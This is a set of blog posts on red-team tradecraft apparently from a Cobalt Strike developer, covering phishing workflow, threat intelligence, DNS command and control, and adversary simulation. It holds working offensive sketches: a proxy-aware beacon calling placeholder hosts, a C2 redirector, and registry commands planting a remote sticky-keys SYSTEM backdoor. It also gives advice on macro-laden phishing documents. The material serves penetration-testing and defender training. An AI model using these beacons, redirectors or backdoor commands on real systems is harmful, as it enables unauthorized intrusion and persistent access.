Course Review: Dark Side Ops

December 22, 2014

“Dark Side Ops (DSO) is a course on targeted attacks, evasion, and advanced post exploitation… with a twist. The thesis of DSO is this: if you want to credibly simulate a real world attacker, you need advanced capability. You can’t do this with unmodified open source tools. This course teaches students how to build and modify advanced capabilities. Let’s take a closer look.”

Recently, I spent a few days in a course that combines malware development and advanced tradecraft into one package. I thought the course was so good that I wrote a review of it. You can check out the review over at ethicalhacker.net.

What’s the go-to phishing technique or exploit?

December 17, 2014

This blog post is inspired by a question sent to a local mailing list. The original poster asks, what’s the go-to phishing technique or exploit in a blackbox situation? Here’s my response:

I’ve had to do this before, I sell tools to do it now, and I’ve seen how others teach and go about this particular process. First, I recommend that you read MetaPhish. No other paper or talk has influenced how I think about this process more:

You’ll notice I said the word process. Before you dig into a toolset, you’ll want to figure out the process you’re going to use. Here’s what I used and it has parallels with the processes I see others use now [regardless of toolset]:

0. Information Gathering

Find out about your target, harvest email addresses, etc. etc. etc.

1. Reconnaissance

This is the phase where you sample the target’s client-side attack surface. I used to send a few fake LinkedIn invitations across an org and direct those folks to a web app that profiles their browser. Similar information to what you see here: http://browserspy.dk/

I’ve seen some organizations use BeEF for this purpose and Black Squirrel does this as well.
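A recon endpoint like this can be sketched in a few lines. This is a minimal, hypothetical example: the field names, port, and handler are illustrative only, and a real profiler would use JavaScript on the page (as BrowserSpy does) to gather far more detail than headers alone.

```python
# Minimal sketch of a recon endpoint that profiles visiting browsers.
# Hypothetical: the field names and port are illustrative, not taken from
# any specific tool (BrowserSpy, BeEF, Black Squirrel, etc.).
from http.server import BaseHTTPRequestHandler, HTTPServer

def profile_from_headers(headers):
    """Reduce request headers to the client-side attack surface we care about."""
    return {
        "user_agent": headers.get("User-Agent", "unknown"),
        "accept_language": headers.get("Accept-Language", "unknown"),
        # Plugin and version detail normally comes from JavaScript on the
        # page; headers alone give only a coarse profile.
    }

class ProfileHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        record = profile_from_headers(self.headers)
        print(record)  # in practice: log to a datastore for later analysis
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<html><body>Thanks for connecting!</body></html>")

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ProfileHandler).serve_forever()
```

Header-based profiling only yields a coarse picture; the point is to capture whatever the client volunteers before you commit to an attack.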

2. Stand up a Test Environment

Next, I recommend that you create a virtual machine to mirror their environment as closely as possible. Install patches and other tweaks you think may be present. This isn’t the place to underestimate their posture. I’d also recommend trying out the different A/V products you expect to see at this point. Use the information from the reconnaissance step to make this as exact as possible.

3. Choose your attack

Now, you will need to select an attack to use against your target. I really recommend that you stay away from the memory corruption exploits in the Metasploit Framework. You can tweak them to get around some anti-virus products. But, you really need to pay attention to the exploit’s needs. For example, let’s say the target profile reveals a vulnerable version of IE and Metasploit has an exploit for it. What are the dependencies of that exploit? Does it also require Java 1.6 to help it get past some of Windows’ protections? You could play this game. Or, you could skip it altogether.

Many folks who execute these kinds of engagements regularly use user-driven attacks. A user-driven attack relies on normal application functionality and on fooling the user into taking some detrimental action. The Java Applet attack is an example of a very popular user-driven attack. I’m surprised it still works today, but *shrug*. Embedding a macro into a Word document or Excel spreadsheet is also effective.

The stock VBA macro you can get out of the Metasploit Framework is also pretty good [it injects straight into memory]. I understand that BeEF has some options in this area too, but I haven’t played with them.

4. Pair your attack with a payload

Don’t take it for granted that you’ll walk out of your target’s network with a Metasploit Framework payload. I see egress as one of the toughest problems when working with a harder target. If you have to use a Metasploit Framework payload, windows/meterpreter/reverse_https is your best bet here. I recommend that you look for and consider other options though. A lot of organizations who do this kind of work have a custom payload or they buy one. If I were in a hurry to cobble up a process and didn’t have a budget, I’d look at building something in PowerShell. The main things you care about:

a. Is the payload proxy aware? Will it take the same actions that the user’s browser would take to get out to the internet?

b. Can I match the payload’s characteristics to the target environment? For example, making its User-Agent match something legitimate?

bb. If I opt to go SSL, can I use a legitimate certificate? If not, does the payload at least try to look like legitimate traffic if I communicate without SSL?

c. Is the payload asynchronous? You really want something reliable that doesn’t stand out while you figure out what to do next on your target’s network.

d. Can I pair this payload with my attack? This is an important consideration. If you have a great piece of custom malware but *can’t* pair it with your chosen attack, it’s not useful to you for this phase of your engagement.

Your custom payload [bought/built] does not need to be fully functional. Its main goal is to defeat egress restrictions and act as a lifeline while you figure out the best steps to fortify your access [if that’s what your customer wants]. The main thing it needs to be able to do is spawn another payload.

Here’s one of my favorite talks on how to pull something like this together, quickly:

I also recommend that you set up separate infrastructure for each piece of this attack. You should send phishes from different places. You should host your recon app on its own server. The server your user-driven attack stages your payload from should differ from the server the payload actually communicates with [if your payload is delivered in stages]. Ideally, your asynchronous lifeline payload should call home to multiple hosts in case one of them becomes blocked.
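To make the checklist concrete, here’s a rough sketch of a “lifeline” beacon along the lines of items a through d. Everything in it is a placeholder assumption: the callback hosts, check-in path, and User-Agent string are invented for illustration, and a real payload would need tasking, encryption, and much more.

```python
# Sketch of an asynchronous, proxy-aware "lifeline" beacon. Hypothetical
# throughout: the hosts, path, and User-Agent below are placeholders.
import random
import time
import urllib.request

CALLBACK_HOSTS = ["cdn-a.example.com", "cdn-b.example.com"]  # redundancy
USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"

def check_in(host):
    # urllib honors the system proxy settings by default [item a]; the
    # User-Agent is forced to blend with legitimate traffic [item b].
    req = urllib.request.Request(
        f"http://{host}/updates/check", headers={"User-Agent": USER_AGENT})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()  # tasking, if any

def next_sleep(base=3600, jitter=0.2):
    """Asynchronous tempo [item c]: a long interval, randomized so the
    check-ins don't land on a fixed, easily spotted beat."""
    return base * (1 + random.uniform(-jitter, jitter))

def beacon_loop():
    while True:
        for host in CALLBACK_HOSTS:  # fall back if one host becomes blocked
            try:
                tasking = check_in(host)
                break
            except OSError:
                continue
        time.sleep(next_sleep())
```

Item d [pairing with the attack] is a packaging question rather than a code question: whatever delivers your attack has to be able to run this stage.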

5. Deliver the package

The final phase is to send the package on to your target. I don’t recommend that you spray every email you found. If your goal is to demonstrate a targeted attack, be targeted.

Personally, I’m a stickler for pixel perfect phishing emails and I’m not a fan of crafting an HTML email in a hacker tool to achieve this. If in doubt, I recommend that you use the same email client that your legend [the person you’re pretending to be] would use to send the email. If your target is someone in HR and your legend is someone applying for a job, use Gmail to send your phish. Preferably, the same Gmail account noted in the resume.doc you embedded a macro inside of.

Before you phish, I recommend that you send your package to yourself, through infrastructure that mirrors your target environment as closely as possible. If your target uses a cloud email service, try to get an account on the free or low-tier paid version of this service and send your package to yourself there. If your target uses a more traditional Exchange+Outlook setup, see if you can build a lab with those pieces or rely on a friend who has access to something similar. The main point here is to make sure your lovingly crafted bundle of good isn’t going to the spam folder. It’d be a shame to go through all of this work to get stopped by that.

Even if you have a favorite “go to” user-driven attack, I recommend executing this process anyway. You don’t want to fire an attack package crafted for a Windows environment only to find that your target is a MacOS X shop.

Tradecraft parts 3, 4, and 8 cover these topics.

Audiences… or who I think I’m writing for

December 11, 2014

This is another meta-post about this blog. If you’re not a regular reader of this blog, this post is probably not for you. I’d like to share the different audiences I imagine when I write on this blog. Conveniently, the categories map quite well to audiences.

In the Metasploit Framework category I imagine that I’m writing to members of the Metasploit Framework community. I generally document the undocumented and share things I’ve learned digging deep into the framework here. My assumption is that if I find it interesting, others probably will too.

In the red team category I write a lot about my experiences supporting different cyber defense exercises. Once in a while, I delve into experiences from when I was penetration testing. This category is a mix of techniques and ideas about how to organize a red team. Earlier this year I had the opportunity to take part in a large-scale cyber war game run by folks I hadn’t worked with before. When I arrived, I found out that a big part of how I got there was this blog. Apparently, not enough people talk about how to scale large red teams and collaborate. Who knew?

In the Cobalt Strike category I announce new releases and write about different Cobalt Strike features. This category is meant for Cobalt Strike’s users. I see my blog as an extension of the online training. I update the online course every two years. In between, this blog is my place to capture the thought process and tradecraft that goes with each new feature. If you want to keep up with the latest of what Cobalt Strike can do or where it’s going, this blog is the place to do it. Oftentimes, questions customers ask end up as posts in this category too.

Once in a great while I make an attempt at writing reference pieces. These are my “What Penetration Testers Should Know” posts. I find these posts incredibly difficult to write. I usually stick these in the red team category. These posts have minimal marketing in them and usually appeal to a broad audience. I know when I want more traffic, I can sequester myself for a week to write one. Sadly, I don’t have many weeks where I can get away with this.

Some past posts:

I also occasionally write blog posts that document a technique and include source code. I think it’s important to continue to share code and knowledge with my peers. These posts are pretty difficult to write as well. The code I release in these contexts is usually meant as something for others to learn from, so I have to take my time to make it clear and document it.

Some past examples of these posts include:

And, finally, I’m starting to write blog posts on industry trends I see. I work with a lot of red teams and services firms through my Cobalt Strike product. These teams buy my product because there’s something they want to do with it. From this vantage point I see penetration testing evolving. The old way probably won’t go away, but I see new kinds of offensive services resonating well with customers. These posts are targeted at those who are championing these ideas within their organizations.

Here’s a few to look at along these lines:

And, that’s pretty much it. I published my post for this week and now I’m off the hook.

When You Know Your Enemy

December 4, 2014

TL;DR This is my opinion on Threat Intelligence: Automated Defense using Threat Intelligence feeds is (probably) rebranded anti-virus. Threat Intelligence offers benefit when used to hunt for or design mitigations to defeat advanced adversaries. Blue teams that act on this knowledge have an advantage over that adversary and others that use similar tactics.

Threat Intelligence is one of those topics you either love to scoff at or embrace. In this post, I’ll share my hopes, dreams, and aspirations for the budding discipline of Threat Intelligence.

I define Threat Intelligence as actionable adversary-specific information to help you defend your network. There are several firms that sell threat intelligence. Each of these firms tracks, collects on, and produces reports and raw indicator information for multiple actors. What’s in these reports and how these companies collect their information depends on the company and the means and relationships at their disposal.

How best to get value from Threat Intelligence is up for debate and there are many theories and products to answer this question. The competing ideas concern what counts as actionable information and how you should use it.

Anti-virus Reborn as… Anti-virus

One theory for Threat Intelligence is to provide a feed with IP addresses, domain names, and file hashes for known bad activity. Customers subscribe to this feed, their network defense tools ingest it, and now their network is automatically safe from any actor that the Threat Intelligence provider reports on. Many technical experts scoff at this, and not without reason. This is not far off from the anti-virus model.

The above theory is NOT why I care about Threat Intelligence. My interest is driven by my admittedly skewed offensive experiences. Let me put you into my shoes for a moment…

I build hacking tools for a living. These tools get a lot of use at different Cyber Defense Exercises. Year after year, I see repeat defenders and new defenders. For some defenders, Cobalt Strike is part of their threat model. These teams know they need to defend against Cobalt Strike capability. They also know they need to defend against the Metasploit Framework, Dark Comet, and other common tools too. These tools are known. I am quick to embrace and promote alternate capabilities for this exact reason. Diversity is good for offense.

I have to live with defenders that have access to my tools. This forces me to come up with ways for my power users and I to stay ahead of smart defenders. It’s a fun game and it forces my tools to get better.

The low hanging fruit of Threat Intelligence makes little sense to me. As an attacker, I can change my IP addresses easily enough. I stand up core infrastructure, somewhere on the internet, and I use redirectors to protect my infrastructure’s location from network defenders. Redirectors are bounce servers that sit between my infrastructure and the target’s network. I also have no problem changing my hashes or the process I use to generate my executable and DLL artifacts. Cobalt Strike has thought out workflows for this.
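A redirector can be as simple as a dumb byte pipe. Here’s a minimal sketch; the upstream address and listen ports are hypothetical placeholders:

```python
# A minimal "dumb pipe" redirector sketch: accept a connection and relay
# bytes to the real team server, so only the redirector's disposable IP
# appears in the target's logs. UPSTREAM/LISTEN values are placeholders.
import socket
import threading

UPSTREAM = ("10.0.0.5", 443)   # real infrastructure, hidden from the target
LISTEN = ("0.0.0.0", 443)      # disposable, internet-facing address

def pipe(src, dst):
    """Copy bytes one way until either side closes."""
    try:
        while (data := src.recv(4096)):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        src.close()
        dst.close()

def serve():
    listener = socket.create_server(LISTEN)
    while True:
        client, _ = listener.accept()
        upstream = socket.create_connection(UPSTREAM)
        # one thread per direction: client -> upstream, upstream -> client
        threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()
```

When a defender blocks the redirector’s address, you stand up another cheap bounce server and the core infrastructure never moves.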

I worry about the things that are harder to change.

Why is notepad.exe connecting to the Internet?

Each blue team will latch on to their favorite indicators. I remember one year many blue teams spoke of the notepad.exe malware. They would communicate with each other about the tendency for red team payloads to inject themselves into notepad.exe. This is a lazy indicator, originating from the Metasploit Framework and older versions of Cobalt Strike. It’s something a red operator can change, but few bother to do so. I would expect to see this type of indicator in the technical section of a Threat Intelligence report. This information would help a blue team get ahead of the red teams I worked with that year.

If you’d like to see how this is done, I recommend that you read J.J. Guy‘s case study on how to use Carbon Black to investigate this type of indicator.
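The hunting logic itself is simple once you have process telemetry. Here’s a sketch over hypothetical records; the field names are invented and stand in for what a sensor like Carbon Black would actually return:

```python
# Sketch of hunting the "notepad.exe with a network connection" indicator.
# Hypothetical: the records below stand in for real endpoint telemetry;
# the field names are illustrative, not any vendor's schema.

# Processes that have no business talking to the internet.
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe"}

def suspicious(processes):
    """Flag deny-listed processes that hold network connections."""
    return [p["name"] for p in processes
            if p["name"].lower() in NO_NETWORK_EXPECTED
            and p["connections"] > 0]

telemetry = [
    {"name": "notepad.exe", "connections": 1},   # the lazy-injection indicator
    {"name": "chrome.exe",  "connections": 12},  # expected to talk
    {"name": "notepad.exe", "connections": 0},   # benign instance
]
```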

Several blue teams worry about Cobalt Strike and its Beacon payload. This is my capability to replicate an advanced adversary. These teams download the trial and pick apart my tool to find indicators that they can use to find Beacon. These teams know they can’t predict my IP addresses, which attack I will use, or what file I will touch disk with. There are other ways to spot or mitigate an attacker’s favorite techniques.

DNS Command and Control

One place you can bring hurt to an attacker is their command and control. If you understand how they communicate, you can design mitigations to break this, or at least spot their activity with the fixed indicators in their communication. One of my favorite stories involves DNS.

Cobalt Strike has had a robust DNS communication capability since 2013. It’s had DNS beaconing since late 2012. This year, several repeat blue teams had strategies to find or defeat DNS C2. One team took my trial and figured out that parts of my DNS communication scheme were case sensitive. They modified their DNS server to randomly change the casing of all DNS replies and break my communication scheme.
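The trick is easy to illustrate. In the sketch below, the “C2 encoder” is a stand-in (plain Base32, whose decoder is case sensitive by default); Cobalt Strike’s actual scheme differs, but the effect of the defender’s case mangling is the same:

```python
# Sketch of the blue team's case-randomization trick: if the red team's DNS
# C2 decoder is case sensitive, replies with randomized casing break it.
# The Base32 "encoder" here is a stand-in, not Cobalt Strike's real scheme.
import base64
import random

def encode_label(data):
    """Red team side: pack data into a DNS-safe label (uppercase A-Z, 2-7)."""
    return base64.b32encode(data).decode()

def fragile_decode(label):
    """Red team side: a case-sensitive decoder. b32decode() without
    casefold=True rejects lowercase characters outright."""
    return base64.b32decode(label)

def randomize_case(name, rng):
    """Defender side: what the modified DNS server does to every reply."""
    return "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in name)
```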

This helped them mitigate red team activity longer than other blue teams. This is another example where information about your adversary can help. If you know there’s a critical weakness in your adversary’s toolchain, use that weakness to protect your network against it. This is not much different from spoofing a mutex value or changing a registry option to inoculate a network against a piece of malware.

This story doesn’t end there though. This team fixated on DNS and they saw it as the red team’s silver bullet. Once we proved we could use DNS, we put our efforts towards defeating the proxy restrictions each team had in place. We were eventually able to defeat this team’s proxy and we had another channel to work in their network. We used outbound HTTP requests through their restrictive proxy server to control a host and pivot to others. They were still watching for us over DNS. The lesson? Even though your Threat Intelligence offers an estimate of an adversary’s capability, don’t neglect the basics, and don’t assume that’s the way they will always hit you. A good adversary will adapt.

To Seek Out New Malware in New Processes…

After a National CCDC event, a student team revealed that they would go through each process and look for WinINet artifacts to hunt Beacon. This is beautiful on so many levels. I build technologies, like Malleable C2, to allow a red operator to customize their indicators and give my payload life, even when the payload is known by those who defend against it. This blue team came up with a non-changing indicator in my payload’s behavior. Fixed malware behavior or artifacts in memory are things a Threat Intelligence company can provide a client’s hunt team. These are tools to find the adversary.

It’s (not) always about the Malware

The red teams I work with quickly judge which teams are hard and which teams are not. We adjust our tradecraft to give harder teams a better challenge. There are a few ways we’ll do this.

Sometimes I know I can’t put malware on key servers. When this happens, I’ll try to live on the systems the defenders neglect. I then use configuration backdoors and trust relationships to keep access to the servers that are well protected. When I need to, I’ll use RDP or some other built-in tool to work with the well protected server. In this way, I get what I need without alerting the blue team to my activity. Malware on a target is not a requirement for an attacker to accomplish their goal.

CrowdStrike tracks an actor they call DEEP PANDA. This actor uses very similar tradecraft. If a blue team knew my favored tradecraft and tricks in these situations, they could instrument their tools and scripts to look for my behavior.

A few points…

You may say, that’s one adversary. What about the others? There are several ways to accomplish offensive tasks and each technique has its limitations (e.g., DNS as a channel). If you mitigate or detect a tactic, you’ll likely affect or find other adversaries that use that tactic too. If an adversary comes up with something novel and uses it in the wild, Threat Intelligence is a way to find out about it, and stay ahead of advancing adversary tradecraft. Why not let the adversary’s offensive research work for you?

You may also argue that your organization is still working on the basics. They’re not ready for this. I understand. These concepts are not for every organization. If you have a mature intrusion response capability, these are ideas about how Threat Intelligence can make it better. These concepts are a complement to, not a replacement for, the other best practices in network defense.

And…

You’ll notice that I speak favorably of Threat Intelligence and its possibilities. I read the glossy marketing reports these vendors release to tease their services. The information in the good reports isn’t far off from the information blue teams use to understand and get an edge in different Cyber Defense Exercises.

In each of these stories, you’ll notice a common theme. The red team is in the network or will get in the network (Assume Compromise!). Knowledge of the red actor’s tools AND tradecraft helps the blue teams get an advantage. These teams use their adversary knowledge in one of two ways: they either design a mitigation against that tactic or they hunt for the red team’s activity. When I look at Threat Intelligence, I see the most value when it aids a thinking blue operator in this way. As a red operator, this is where I’ve seen the most challenge.

Further Reading

  • Take a look at The Pyramid of Pain by David Bianco. This post discusses indicators in terms of things you deny the adversary. If you deny the adversary an IP address, you force them to take a routine action. If you deny the adversary use of a tool, you cause them a great deal of pain. David’s post is very much in the spirit of this one. Thanks to J.J. Guy for the link.

My Constraint-based Product Strategy

November 26, 2014

When I work on a project, I like to define a broad problem statement. This is the project’s intended mark on the world. I don’t have enough hubris to claim a solution for all cases. To make my projects tractable, I define assumptions. These assumptions bound the problem statement and keep the work under control. I tend to live within my assumptions until I feel the project has outgrown them. When this happens, I look for an opportunity to redefine my work under a new problem statement or, at least, new assumptions.

In this blog post, I’ll take you through the problem statements and assumptions that define Armitage and Cobalt Strike. It’s fitting that I write this now, because I’m re-examining Cobalt Strike’s problem statement and assumptions.

Armitage

Armitage is a scriptable user interface for the Metasploit Framework that allows red teams to collaborate. Armitage has a broad problem statement: how do I help red teams collaborate?

Armitage lives under a set of assumptions.

First, I had to define a use case for this project. I opted to scope Armitage’s use case to exercise red teams, particularly red teams for the Collegiate Cyber Defense Competitions, which I had a lot of volunteer involvement with.

Next, I scoped Armitage to the Metasploit Framework only. I had zero intention of building the one collaboration framework to rule them all. I wanted to explore some ideas within the context of the Metasploit Framework and what it offers. This meant I would not integrate third-party hacking tools with Armitage and I would not build new hacking capability into it. These assumptions gave me suitable constraints to build and reason about Armitage.

This weekend, Armitage will celebrate its fourth birthday. I continue to maintain this project, but Armitage was successful in its original efforts a long time ago. Today, most penetration testing and red team platforms have collaboration features. Armitage is a familiar face at events where hackers have to work together with the Metasploit Framework. We now have good practices [1, 2, 3, 4] to organize red teams in cyber defense exercises.

Cobalt Strike

I used to work on a red team support contract. Stealth and evasion mattered a great deal. I ran into the limitations of available tools. I saw a need for penetration testing tools to challenge harder targets. My work on these problems became Cobalt Strike. I define Cobalt Strike’s problem set as closing the gap between penetration testing tools and so-called advanced threat capabilities. It’s in my logo even! “Advanced Threat Tactics for Penetration Testers”. 

Like Armitage, Cobalt Strike lives under a set of assumptions too.

Every feature I build into Cobalt Strike requires synergy with a stock instance of the Metasploit Framework. This assumption led to a collection of tools very focused on the Windows attack surface. Some of Cobalt Strike’s concepts would be right at home with a MacOS X target, but there’s too little opportunity for synergy with the Metasploit Framework, so I haven’t looked in this direction. My emphasis on 32-bit payloads also comes from this assumption.

Second, Cobalt Strike is made for a hypothetical internal red team for a large corporate or government enterprise. This assumption has had major influences on my product. It defines the problems I care about and the things I ignore. Let’s use browser pivoting as an example. This technology was made to meet a need for a segment of users. These users care about Internet Explorer, not Google Chrome or Firefox. Hence, browser pivoting was made for Internet Explorer.

Third, Cobalt Strike is built for a remote operations use case. This influences the problems I work on as well. I assume that my user is a remote actor. This is why I provide covert communication options and focus on ways to evade egress restrictions. Under my assumptions, if a user can’t get out, they can’t use the rest of the toolset. This assumption also limits the features I build and the workflows I support. If a tactic isn’t practical for a remote actor, I ignore it.

My last assumption relates to what Cobalt Strike does. Cobalt Strike executes targeted attacks and replicates advanced threats. That statement is marketing speak for “sends phishing emails and focuses on post exploitation”. I wrote the last sentence tongue-in-cheek, but there’s a reality to it. My tool supports a process: set up a client-side attack, phish to get a foothold, abuse trusts for lateral movement, and conduct post exploitation to achieve some objective/demonstrate risk. I focus on this process and work to make this tool better support it. Few engagements execute this process end-to-end, so I make sure to decouple these pieces from each other. That said, this clear definition of what Cobalt Strike does helps guide my development efforts.

Cobalt Strike has nearly two and a half years on the market and it’s had a lot of updates in that time. I still have work to do within Cobalt Strike’s problem set, but I feel it’s a good product for its stated use cases.

What’s next?

I’m thinking a lot about Cobalt Strike’s next iteration. At this time, I’m revisiting Cobalt Strike’s problem statement and assumptions. As I think about what’s coming next, here are a few things at the top of my mind:

First, I believe there’s a “good enough” level for hacker capability. After a point, better malware and capability will only take a red team so far. I see several needs that I categorize as features to support assessors with growing accountability and storytelling requirements. This is a sign that some security programs are maturing and these customers expect more detail from us. I think there’s a need to put equal effort into these requirements.

I also believe we’re witnessing the emergence of a service that most penetration testers and red teams will soon offer. These are assessments that assume compromise and focus on an organization’s post-compromise security posture. Particularly, the organization’s ability to detect and remediate a sophisticated intruder. I wrote about this in a previous blog post.

Finally, I believe the deprecation of Windows XP was the end of an era. There are ideas and concepts in our tools and services that date back to the beginning of this era. I think some of these things are holding us back.

I’m not ready to speak specifics on these things yet, but I’m closely examining my tradecraft, process, and tools. I’m asking the hard questions: what’s historic baggage? What makes sense for the red team and adversary simulation use cases going forward?

Cobalt Strike 2.2 – 1995 called, it wants its covert channel back…

November 20, 2014

Cobalt Strike’s Covert VPN feature now supports ICMP as one of its channels. Covert VPN is Cobalt Strike’s layer-2 pivoting capability. If you’re curious about how this technology works, I released some source code a few weeks ago.

The ICMP data channel is a turn-key way to demonstrate ICMP as an exfiltration channel if you need to prove a point. Here’s a video demonstrating Covert VPN’s ICMP channel with a server in Amazon’s EC2:

I don’t expect you to VPN all the things, but I’m excited. This feature is a step towards other work with ICMP in the future.

The ICMP VPN channel is available in today’s 2.2 release of Cobalt Strike. This release also touches and improves many of Cobalt Strike’s other features. The VNC server injection process was rewritten to better evade host-based firewalls. The spear phishing tool now handles message templates with embedded image attachments. You also get several bug fixes too. I recommend that you read the release notes for the full list of changes.

Licensed users may get the latest with the built-in update program. A 21-day trial of Cobalt Strike is available too.

Adversary Simulation Becomes a Thing…

November 12, 2014

There is a growing chorus of folks talking about simulating targeted attacks from known adversaries as a valuable security service.

The argument goes like this: penetration testers are vulnerability focused and have a toolset/style that replicates a penetration tester. This style finds security problems and it helps, but it does little to prepare the customer for the targeted attacks they will experience.

Adversary simulation is different. It focuses on the customer’s ability to deal with an attack, post-compromise. These assessments look at incident response and provide a valuable “live fire” training opportunity for the analysts who hunt for and respond to incidents each day.

The organizations that buy security products and services are starting to see that compromise is inevitable. These organizations spend money on blinky boxes, people, services, and processes to deal with this situation. They need a way to know whether or not this investment is effective. Adversary simulation is a way to do this.

What is adversary simulation?

There’s no standard definition for adversary simulation, yet. It doesn’t even have an agreed upon term. I’ve heard threat emulation, purple teaming, and attack simulation used to discuss roughly the same concept. I feel like several of us are wearing blindfolds, feeling around our immediate vicinity, and working to describe an elephant to each other.

From the discussions on this concept, I see a few common elements:

The goal of adversary simulation is to prepare network defense staff for the highly sophisticated targeted attacks their organization may face.

Adversary simulation assumes compromise. The access vector doesn’t matter as much as the post-compromise actions. This makes sense to me. If an adversary lives in your network for years, the 0-day used three years ago doesn’t really matter. Offensive techniques, like the Golden Ticket, turn long-term persistence on its head. An adversary may return to your network and resume complete control of your domain at any time. This is happening.

Adversary simulation is a white box activity, sometimes driven by a sequence of events or a story board. It is not the goal of an adversary simulation exercise to demonstrate a novel attack path. There are different ways to come up with this sequence of events. You could use a novel attack from a prior red team assessment or real-world intrusion. You could also host a meeting to discuss threat models and derive a plausible scenario from that.

There’s some understanding that adversary simulation involves meaningful network and host-based indicators. These are the observables a network defense team will use to detect and understand the attacker. The simulated indicators should allow the network defense team to exercise the same steps they would take if they had to respond to the real attacker. This requires creative adversary operators with an open mind about other ways to hack. These operators must learn the adversary’s tradecraft and cobble together something that resembles their process. They must pay attention to the protocols the adversary uses, the indicators in the communication, the tempo of the communication, and whether or not the actor relies on distributed infrastructure. Host-based indicators and persistence techniques matter too. The best training results will come from simulating these elements very closely.

Adversary simulation is inherently cooperative. Sometimes, the adversary operator executes the scenario with the network defense team present. Other times the operator debriefs after all of the actions are executed. In both cases, the adversary operators give up their indicators and techniques to allow the network defense team to learn from the experience and come up with ways to improve their process. This requirement places a great burden on an adversary simulation toolkit. The adversary operators need ways to execute the same scenario with new indicators or twists to measure improvement.

Hacking to get Caught – A Concept for Adversary Replication and Penetration Testing

Threat Models that Exercise Your SIEM and Incident Response

Comprehensive Testing: Red and Blue Make Purple

Seeing Purple: Hybrid Security Teams for the Enterprise

Isn’t this the same as red teaming?

I see a simulated attack as different from a red team or full scope assessment. A red team assessment exercises a mature security program in a comprehensive way. A skilled team conducts a real-world attack, stays in the network, and steals information. At the end, they reveal a (novel?) attack path and demonstrate risk. The red team’s report becomes a tool to inform decision makers about their security program and to justify added resources or changes.

A useful full scope assessment requires ample time, and that makes these assessments expensive.

Adversary simulation does not have to be expensive or elaborate. You can spend a day running through scenarios once each quarter. You can start simple and improve your approach as time goes on. This is an activity that is accessible to security programs with different levels of budget and maturity.

How does this relate to Cyber Defense Exercises?

I participate in a lot of Cyber Defense Exercises. Some events are set up as live-fire training against a credible simulated adversary. These exercises are driven by a narrative, and the red team executes the actions the narrative requires. The narrative also drives the post-action discussion. All red team activities are white box, as the red team is not the training audience. These elements make cyber defense exercises very similar to adversary simulation as I’m describing it here. This is probably why the discussion perks up my ears; it’s familiar ground to me.

There are some differences though.

These exercises don’t happen in production networks; they happen in labs. This introduces a lot of artificiality. The participants don’t get to “train as they fight,” because many of the tools and sensors they use at home do not exist in the lab. There is also no element of surprise to help the attacker; network defense teams come to these events ready to defend. These events usually involve multiple teams, which creates an element of competition. A safe adversary simulation, conducted on a production network, does not need to suffer from these drawbacks.

Why don’t we call it “Purple Teaming”?

Purple Teaming is a discussion about how red teams and blue teams can work together. Ideas about how to do this differ. I wouldn’t refer to Adversary Simulation as Purple Teaming. You could argue that Adversary Simulation is a form of Purple Teaming. It’s not the only form though. Some forms of purple teaming have a penetration tester sit with a network defense team and dissect penetration tester tradecraft. There are other ways to hack beyond the favored tricks and tools of penetration testers.

Let’s use lateral movement as an example:

A penetration tester might use Metasploit’s PsExec to demonstrate lateral movement, help a blue team zero in on this behavior, and call it a day. A red team member might drop to a shell and use native tools to demonstrate lateral movement, help a blue team understand these options, and move on.

An adversary operator tasked to replicate the recent behavior of a “nation-state affiliated” actor might load a Golden Ticket into their session and use that trust to remotely set up a sticky keys-like backdoor on targets and control them with RDP. This is a form of lateral movement, and it’s tied to an observed adversary tactic. The debrief in this case focuses on the novel tactic and potential strategies to detect and mitigate it.
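The sticky keys-style backdoor in this scenario is commonly implemented with the Image File Execution Options “Debugger” registry value. Here’s a sketch of the Windows commands; the TARGET hostname is illustrative:

```
:: Register cmd.exe as the "debugger" for sethc.exe on the remote host.
:: Pressing Shift five times at the RDP login screen then spawns a
:: SYSTEM shell instead of Sticky Keys.
reg add "\\TARGET\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f

:: Make sure RDP is enabled so the backdoor is reachable.
reg add "\\TARGET\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```

No agent has to live on the target; the “malware” is a registry value and a built-in binary, which is exactly the sort of indicator this kind of debrief should surface.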

Do you see the difference? A penetration tester or red team member will show something that works for them. An adversary operator will simulate a target adversary and help their customer understand and improve their posture against that adversary. Giving defenders exposure and training on tactics, techniques, and procedures beyond the typical penetration tester’s arsenal is one of the reasons adversary simulation is so important.

What are the best practices for Adversary Simulation?

Adversary Simulation is a developing area. There are several approaches and I’m sure others will emerge over time…

Traffic Generation

One way to simulate an adversary is to simulate their traffic on the wire. This is an opportunity to validate custom rules and to verify that sensors are firing. It’s a low-cost way to drill intrusion response and intrusion detection staff too. Fire off something obvious and see how long it takes the team to detect it. If they never do, you immediately know you have a problem.
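As a minimal sketch of this idea, the snippet below crafts a raw HTTP request that mimics a C2 check-in. The hostname, URI, and User-Agent here are placeholders; you would swap in the indicators from whatever signature you want to exercise:

```python
# Sketch: generate "known bad" traffic to verify that an IDS rule fires.
def build_beacon_request(host, uri, user_agent):
    """Craft a raw HTTP GET that mimics a C2 check-in."""
    return (
        f"GET {uri} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {user_agent}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()

request = build_beacon_request(
    "sensor-test.example.com",
    "/updates/check.php?id=1234",
    # a dated User-Agent of the sort that shows up in old RAT signatures
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
)
```

Send the bytes with `socket.create_connection()` across a monitored segment, then time how long it takes the monitoring team to report the alert.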

Marcus Carey’s vSploit is an example of this approach. Keep an eye on his company, FireDrill.me, as he’s expanding on his original ideas there as well.

DEF CON 19 – Metasploit vSploit Modules

Use Known Malware

